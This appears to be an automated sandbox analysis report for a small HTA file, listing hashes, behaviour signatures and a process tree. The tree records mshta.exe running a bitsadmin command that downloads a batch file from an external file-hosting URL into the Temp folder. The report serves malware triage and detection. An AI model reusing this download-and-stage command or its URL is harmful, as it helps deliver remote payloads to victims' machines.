Analysis

  • max time kernel
    118s
  • max time network
    123s
  • platform
    windows7_x64
  • resource
    win7-20230712-en
  • resource tags

    arch:x64arch:x86image:win7-20230712-enlocale:en-usos:windows7-x64system
  • submitted
    03-08-2023 07:50

General

  • Target

    akuy4l.hta

  • Size

    896B

  • MD5

    ce90f45a4b8b1293cfb92f591c717d51

  • SHA1

    5336b02e6b573891fb4bd2898849c3a94a77dc51

  • SHA256

    b08756158b8b618cdf9defc7134737b1d0da931210b583643a7a0af3e927b9c4

  • SHA512

    d553d0a177ea68d11a7aab548d7613e356cb9875b8e2995aee1ba62d8317e0d8de872c40095f4c5e1ac4154f8388e0829717993e51228cd0fccfa6f2bb132f79

Score
3/10

Malware Config

Signatures

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Download via BitsAdmin 1 TTPs 1 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\akuy4l.hta"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2204
    • C:\Windows\SysWOW64\bitsadmin.exe
      "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://files.catbox.moe/enuvvy.bat C:\Users\Admin\AppData\Local\Temp\c.bat
      2⤵
      • Download via BitsAdmin
      PID:2508

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads